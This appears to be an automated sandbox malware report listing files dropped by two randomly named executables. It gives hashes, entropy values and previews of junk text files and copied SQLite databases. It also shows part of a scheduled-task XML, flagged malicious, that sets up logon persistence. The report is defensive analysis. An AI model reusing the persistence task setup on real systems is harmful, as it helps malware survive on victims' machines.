SHA-512:	C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
Malicious:	false
Preview:	VLZDGUKUTZXKWULZBWDOTEIBVHVGPZOMETVGLHEKQQVYNUMUAOLBNSHZYTRKXENILISUHDAEEZWZEUNNMWJTKJJOLHKIGJBIHEMLZPVHEUDLHUZCSBUYGAPQSLHCFWHXEYFYTFGZTQNGXBIUAIOYCCCESLXKQMZDVXCDPKMYSWUFQOOGYCQASGJXLVOEKXBOBXDUKGAWAMSEHSFOUBZESSHGPVUWBSAXMDDSNTFJRIJVCYNCFLCMAYHAQBOVOYCQICAPOEIAOZZDHRFCBPBIJRAALGUMCZXSSRKWWTLWRCAGMBKLQATMELORFDRFOPMXYZUWVDECUBFKJYGAVNPIZHJACVPSNOSYGMZANGHNGZCHMGRVBLZWYXERUYHSGKNYMBIUOUVRRQZNFUEYVDSYNZOGCQQJBPAGGARUGCQGPSYMVKYFEATFTUASPFCLAYVPLRCXWCNIABDDVKSFBVZOWZJRZCFQZOXEFZYNRBPBMSHMJFACGUVZUTNGJUEWYWGPCEUFNJTHREUEIHDYXUSJMKBAJVWGYJBJZIRJSRNLDQEVFZAKVMKFJSIHDAKHIEZERYMCSJLFMAKTAGUIBEYUESOJBCXDNFVMNZJABIUVYPQJTWFYBZJPMWLOIHNHFGQHJMNWDFCATRHJYRIXKFJEEOLVSFDPTZNPUFUNEEOLRHVCPOPPOMEZBYTGJKKWUQRHCTFVKQBJAPTOLZADSWVPJYRGRDUWSTNCXLPQDMPVWSSFEHFWHSYNGNHOYZMFADSOTZRZJWXBGUPDZLPMKTZHVIXOFUFHPBTLFRGMMRKOTCWSSRSSXZJNZJGFXMQMXYXKQOFUEAKEJMGPTQUQWYKCZWFGOGJXTRBDEBXQWSDHUFBWIRPNOOENTWWFRIBLZBMAFTMZPLFLLVKTGMUXNKLRFNYLEFNKJWPWNLANWBRDASFRDJUPHVZRHEFBINQCKMOVMQOLDBWPTMYMMFRCLWITZRVFLDSOIFRMJCCQXYLT

C:\Users\user\AppData\Local\Temp\tmpA7C.tmp

Download File

Process:	C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.699434772658264
Encrypted:	false
SSDEEP:	24:Khfv+VFngw6i0t5Ut+l3kHwMDkhBlBAMFPxYaija:pvl6Pt5uQ3kQ0khBl1VxYpu
MD5:	02D3A9BE2018CD12945C5969F383EF4A
SHA1:	085F3165672114B2B8E9F73C629ADABBF99F178D
SHA-256:	6088E17DB4C586F5011BC5E16E8BF2E79C496EB6DAE177FF64D9713D39D500CA
SHA-512:	A126D98EE751D0FB768E4DB7D92CBC6AE7852FEE337B85ED045D871DB321C6C98FD58A244D058CA3F41348216C68CB4A37FA854980BB16D358AA62A932DD867E
Malicious:	false
Preview:	ONBQCLYSPUBDAQCIGYNWXHPENQNLJZGXCHXSNXZNCZBUHYDXPEMCJPAWYQSVHMGKHJUFFFYDAXDAHOLOAZEPTWZTWDGPFLXMMCXLCIIJOXMVRNMUMTICVHQSWNAGIYCQBOZZHONWWBXKDUJYBRPSLNFGTUIFTNGJEATOXKHEFMERAQZVBMQGKZUKXDBMGRJDOOGATZZKQMEZJRWZVAZRPQTVWPETCIMLPMYNWZLVLXRPUUKLNIMTYDNYIJTZEFJDNMWTOFFKRRINCRDCFGJAJNMYQHGXGVHVYPEUFBNUIGUVGBYQKIAJLIVACVIHEGZIYKSROURNGZSCTUKBKFFCGPXAONPDEBIZJRKCFYHATDXLXYKGLWXBCHJERCRNMKESIMBDNPMPBWXSVSEAAUEKEGUIJBZLAESAFZHMBLPPKMNTZAZIIYSHMWJBFTZZSKYNFJYSBRLGVHOWZUQHXUSSJESIEKHZLTLILMSMJZHXFWGJQNWQCDLXEWBZPGBTVDVCPPUFLFGNZRUKJOANJVXVTXLOQLFUIVEWTCBKOBYZMAOTIMQMJYRYLSOLSSACCLCFTVXCKKJDNWQAETNXHIOQCDTXLLVEQLNLGDIOULNFNNDXTVYYSPDWWZHDSYHBRXMUAAHJIGSGLSFKCGADPUAASYZFEZWHYDLQDUCHJXMNMTNCDCMNIJQCSGEQOGVGYBYPMTZBBFOACZMMKVFNELOMGSTCQUDRFKLFGOHOTZKZCWJWDRECGYETFYOWLYECGICMGUKZRVNHUQTLQLHUTPRZXBVYMPAFBLSWKSSKBGWCWBFEEZIAZUZGEYMYBSXYUCHEALFJRSGWQJMABNQHSZANDDTYMVJKXFFFDEENZAGRGVLHFELVOSGTXVOOPFGCQDSFWOYKKOYUHFWMXWPLHFIIPORMEJNOFYMJRBAZLYTIOKEFIWPDZUKMIWKLZXBOESUCXZXQSCMQKDKFBCHJMPMZHELLNSYYEJNBRRXVBMPD

C:\Users\user\AppData\Local\Temp\tmpA7D.tmp

Download File

Process:	C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.695685570184741
Encrypted:	false
SSDEEP:	24:SYuCgqv/1uycbC6SHsJPWXpOxTeVtblICcFX4xlyzK7y45wR39IRh:S1CPvsC6YE+XgleVtbQuKGf5M39IRh
MD5:	A28F7445BB3D064C83EB9DBC98091F76
SHA1:	D4E174D2D26333FCB66D3FD84E3D0F67AF41D182
SHA-256:	10A802E683A2C669BB581DE0A192C8291DD2D53D89A2883A59CC29EB14453B93
SHA-512:	42526FEC4220E50DB60BD7D83A07DEB9D5BE4F63AD093B518E9ECC86B779210B0170F6F64C9F16064D50CB12F03643BAC9995D4F3C0AFD5F8D38428D57ADE487
Malicious:	false
Preview:	UMMBDNEQBNVIMBNGHYZCBKXWMQJKYISTANSRNFXXBKALIIEMEWAFQEPTEMZCIXXNMQBGOXWSDYSAWKIYPJITNREMVRXPPJZFUTMGRRRGTCHVLEWVUJGZEUQVONQVACEFWZUCIAFXPFGXIUOOBZEEMGMWJQIEKKICYJJWAFUKYZAJEGUQKGDPRPXCOWIPBRUGHWDFZLGSKZVCHVVPGLEFNGIVLBVNAOVXAPGATADJBIQTBNJGWXRSEYKCSVZOSTCBHYFHUDEWNGEIFCVREPZDZDZRITFEVFCQQWJYZXPUKJWHTWGWASTKDCAVEWZOIGFZHRWCJBVRLDWGVKPABCQUOHQIMLUFUGYGMPGPEMSRPPSGWIGRVPBGZIWLNEVYFFJBCMBSXVABNRNXULCTUAANAXDHKZOGVCNQZHMRBENWTTLQVVMDLNBEWHLPZHMPDGRLJWAQJDJRCWTFWIOLAURRCSMFJOCFDKUGPLTPABARXKPCRXOIHHVRWXAKGHOTYLCEQQYYDKVZQSYLCAEGGBQMMJGSNJWBTJXSVALINNRLURMPNGFXHJRVJIKQJSDLNIOXGIGDFDCOTGGXMDLTDYSIKCMPVINDDXXQCEQCRUBLFEWMYMSEGUHIKIGUYOMOXSKOTVNUNGWUFYKYRNZXOOTSRYXLZHRZXNEDJUNPYGNIIZSPVQBOLBRRRWGDMQWUTRSZWBYMXNMLKLFNZWJVDDPMJOXTVBMYRXNQFGBLURKFIUAHJBFFXNWQDYRLZADYGMETNXEOXLOJKYQPEYHUVTFGXQTGPQBWZQTVFXZFUVQERQZJCYYPFBYONAVFDOLTNRGWQYGSYWCWUWRETJZGVJMEFQTYPOLONVZFREVORMBQJOCLOALCJHHCHQSHKLUNBIRHRBSQSMERLKKFTGHUQKRPFIIELZZVXZVNHCIQYYXNMJNSOZOIRGGJKUWXNCWSNCFMGQIQVNKVIGRCLSDWQPEDLSLTGBRXRTMGFWYQSCLN

C:\Users\user\AppData\Local\Temp\tmpA7E.tmp

Download File

Process:	C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.701757898321461
Encrypted:	false
SSDEEP:	24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
MD5:	520219000D5681B63804A2D138617B27
SHA1:	2C7827C354FD7A58FB662266B7E3008AFB42C567
SHA-256:	C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
SHA-512:	C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
Malicious:	false
Preview:	VLZDGUKUTZXKWULZBWDOTEIBVHVGPZOMETVGLHEKQQVYNUMUAOLBNSHZYTRKXENILISUHDAEEZWZEUNNMWJTKJJOLHKIGJBIHEMLZPVHEUDLHUZCSBUYGAPQSLHCFWHXEYFYTFGZTQNGXBIUAIOYCCCESLXKQMZDVXCDPKMYSWUFQOOGYCQASGJXLVOEKXBOBXDUKGAWAMSEHSFOUBZESSHGPVUWBSAXMDDSNTFJRIJVCYNCFLCMAYHAQBOVOYCQICAPOEIAOZZDHRFCBPBIJRAALGUMCZXSSRKWWTLWRCAGMBKLQATMELORFDRFOPMXYZUWVDECUBFKJYGAVNPIZHJACVPSNOSYGMZANGHNGZCHMGRVBLZWYXERUYHSGKNYMBIUOUVRRQZNFUEYVDSYNZOGCQQJBPAGGARUGCQGPSYMVKYFEATFTUASPFCLAYVPLRCXWCNIABDDVKSFBVZOWZJRZCFQZOXEFZYNRBPBMSHMJFACGUVZUTNGJUEWYWGPCEUFNJTHREUEIHDYXUSJMKBAJVWGYJBJZIRJSRNLDQEVFZAKVMKFJSIHDAKHIEZERYMCSJLFMAKTAGUIBEYUESOJBCXDNFVMNZJABIUVYPQJTWFYBZJPMWLOIHNHFGQHJMNWDFCATRHJYRIXKFJEEOLVSFDPTZNPUFUNEEOLRHVCPOPPOMEZBYTGJKKWUQRHCTFVKQBJAPTOLZADSWVPJYRGRDUWSTNCXLPQDMPVWSSFEHFWHSYNGNHOYZMFADSOTZRZJWXBGUPDZLPMKTZHVIXOFUFHPBTLFRGMMRKOTCWSSRSSXZJNZJGFXMQMXYXKQOFUEAKEJMGPTQUQWYKCZWFGOGJXTRBDEBXQWSDHUFBWIRPNOOENTWWFRIBLZBMAFTMZPLFLLVKTGMUXNKLRFNYLEFNKJWPWNLANWBRDASFRDJUPHVZRHEFBINQCKMOVMQOLDBWPTMYMMFRCLWITZRVFLDSOIFRMJCCQXYLT

C:\Users\user\AppData\Local\Temp\tmpA9F.tmp

Download File

Process:	C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpAAF.tmp

Download File

Process:	C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpB76A.tmp

Download File

Process:	C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpB77B.tmp

Download File

Process:	C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpB78C.tmp

Download File

Process:	C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpB79C.tmp

Download File

Process:	C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpB79D.tmp

Download File

Process:	C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpB7AE.tmp

Download File

Process:	C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpB7BF.tmp

Download File

Process:	C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpB7CF.tmp

Download File

Process:	C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpC18A.tmp

Download File

Process:	C:\Users\user\Desktop\nzLoHpgAln.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1580
Entropy (8bit):	5.130155736755004
Encrypted:	false
SSDEEP:	24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtakxvn:cge1wYrFdOFzOzN33ODOiDdKrsuTpv
MD5:	001D4FF55DAD5C3D15BA786B828DA66E
SHA1:	D988737767AA474D8499B993618963563FCCC980
SHA-256:	D2AE8F1531296B0C6871A1256186C5970B032A4989B65D4FF7238E8E326AF2FA
SHA-512:	742AC8E43EE6E531942805114FF4F4C77DBFB5CAC0913CED000AA87727365D7CD1C6FFF0C45CF92C07FA1DC2098D95907EFAE8ED13BF6ACC2566084E55838B1A
Malicious:	true
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail

C:\Users\user\AppData\Local\Temp\tmpCD34.tmp

Download File

Process:	C:\Users\user\Desktop\nzLoHpgAln.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.699434772658264
Encrypted:	false
SSDEEP:	24:Khfv+VFngw6i0t5Ut+l3kHwMDkhBlBAMFPxYaija:pvl6Pt5uQ3kQ0khBl1VxYpu
MD5:	02D3A9BE2018CD12945C5969F383EF4A
SHA1:	085F3165672114B2B8E9F73C629ADABBF99F178D
SHA-256:	6088E17DB4C586F5011BC5E16E8BF2E79C496EB6DAE177FF64D9713D39D500CA
SHA-512:	A126D98EE751D0FB768E4DB7D92CBC6AE7852FEE337B85ED045D871DB321C6C98FD58A244D058CA3F41348216C68CB4A37FA854980BB16D358AA62A932DD867E
Malicious:	false
Preview:	ONBQCLYSPUBDAQCIGYNWXHPENQNLJZGXCHXSNXZNCZBUHYDXPEMCJPAWYQSVHMGKHJUFFFYDAXDAHOLOAZEPTWZTWDGPFLXMMCXLCIIJOXMVRNMUMTICVHQSWNAGIYCQBOZZHONWWBXKDUJYBRPSLNFGTUIFTNGJEATOXKHEFMERAQZVBMQGKZUKXDBMGRJDOOGATZZKQMEZJRWZVAZRPQTVWPETCIMLPMYNWZLVLXRPUUKLNIMTYDNYIJTZEFJDNMWTOFFKRRINCRDCFGJAJNMYQHGXGVHVYPEUFBNUIGUVGBYQKIAJLIVACVIHEGZIYKSROURNGZSCTUKBKFFCGPXAONPDEBIZJRKCFYHATDXLXYKGLWXBCHJERCRNMKESIMBDNPMPBWXSVSEAAUEKEGUIJBZLAESAFZHMBLPPKMNTZAZIIYSHMWJBFTZZSKYNFJYSBRLGVHOWZUQHXUSSJESIEKHZLTLILMSMJZHXFWGJQNWQCDLXEWBZPGBTVDVCPPUFLFGNZRUKJOANJVXVTXLOQLFUIVEWTCBKOBYZMAOTIMQMJYRYLSOLSSACCLCFTVXCKKJDNWQAETNXHIOQCDTXLLVEQLNLGDIOULNFNNDXTVYYSPDWWZHDSYHBRXMUAAHJIGSGLSFKCGADPUAASYZFEZWHYDLQDUCHJXMNMTNCDCMNIJQCSGEQOGVGYBYPMTZBBFOACZMMKVFNELOMGSTCQUDRFKLFGOHOTZKZCWJWDRECGYETFYOWLYECGICMGUKZRVNHUQTLQLHUTPRZXBVYMPAFBLSWKSSKBGWCWBFEEZIAZUZGEYMYBSXYUCHEALFJRSGWQJMABNQHSZANDDTYMVJKXFFFDEENZAGRGVLHFELVOSGTXVOOPFGCQDSFWOYKKOYUHFWMXWPLHFIIPORMEJNOFYMJRBAZLYTIOKEFIWPDZUKMIWKLZXBOESUCXZXQSCMQKDKFBCHJMPMZHELLNSYYEJNBRRXVBMPD

C:\Users\user\AppData\Local\Temp\tmpCD35.tmp

Download File

Process:	C:\Users\user\Desktop\nzLoHpgAln.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.695685570184741
Encrypted:	false
SSDEEP:	24:SYuCgqv/1uycbC6SHsJPWXpOxTeVtblICcFX4xlyzK7y45wR39IRh:S1CPvsC6YE+XgleVtbQuKGf5M39IRh
MD5:	A28F7445BB3D064C83EB9DBC98091F76
SHA1:	D4E174D2D26333FCB66D3FD84E3D0F67AF41D182
SHA-256:	10A802E683A2C669BB581DE0A192C8291DD2D53D89A2883A59CC29EB14453B93
SHA-512:	42526FEC4220E50DB60BD7D83A07DEB9D5BE4F63AD093B518E9ECC86B779210B0170F6F64C9F16064D50CB12F03643BAC9995D4F3C0AFD5F8D38428D57ADE487
Malicious:	false
Preview:	UMMBDNEQBNVIMBNGHYZCBKXWMQJKYISTANSRNFXXBKALIIEMEWAFQEPTEMZCIXXNMQBGOXWSDYSAWKIYPJITNREMVRXPPJZFUTMGRRRGTCHVLEWVUJGZEUQVONQVACEFWZUCIAFXPFGXIUOOBZEEMGMWJQIEKKICYJJWAFUKYZAJEGUQKGDPRPXCOWIPBRUGHWDFZLGSKZVCHVVPGLEFNGIVLBVNAOVXAPGATADJBIQTBNJGWXRSEYKCSVZOSTCBHYFHUDEWNGEIFCVREPZDZDZRITFEVFCQQWJYZXPUKJWHTWGWASTKDCAVEWZOIGFZHRWCJBVRLDWGVKPABCQUOHQIMLUFUGYGMPGPEMSRPPSGWIGRVPBGZIWLNEVYFFJBCMBSXVABNRNXULCTUAANAXDHKZOGVCNQZHMRBENWTTLQVVMDLNBEWHLPZHMPDGRLJWAQJDJRCWTFWIOLAURRCSMFJOCFDKUGPLTPABARXKPCRXOIHHVRWXAKGHOTYLCEQQYYDKVZQSYLCAEGGBQMMJGSNJWBTJXSVALINNRLURMPNGFXHJRVJIKQJSDLNIOXGIGDFDCOTGGXMDLTDYSIKCMPVINDDXXQCEQCRUBLFEWMYMSEGUHIKIGUYOMOXSKOTVNUNGWUFYKYRNZXOOTSRYXLZHRZXNEDJUNPYGNIIZSPVQBOLBRRRWGDMQWUTRSZWBYMXNMLKLFNZWJVDDPMJOXTVBMYRXNQFGBLURKFIUAHJBFFXNWQDYRLZADYGMETNXEOXLOJKYQPEYHUVTFGXQTGPQBWZQTVFXZFUVQERQZJCYYPFBYONAVFDOLTNRGWQYGSYWCWUWRETJZGVJMEFQTYPOLONVZFREVORMBQJOCLOALCJHHCHQSHKLUNBIRHRBSQSMERLKKFTGHUQKRPFIIELZZVXZVNHCIQYYXNMJNSOZOIRGGJKUWXNCWSNCFMGQIQVNKVIGRCLSDWQPEDLSLTGBRXRTMGFWYQSCLN

C:\Users\user\AppData\Local\Temp\tmpCD36.tmp

Download File

Process:	C:\Users\user\Desktop\nzLoHpgAln.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.701757898321461
Encrypted:	false
SSDEEP:	24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
MD5:	520219000D5681B63804A2D138617B27
SHA1:	2C7827C354FD7A58FB662266B7E3008AFB42C567
SHA-256:	C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
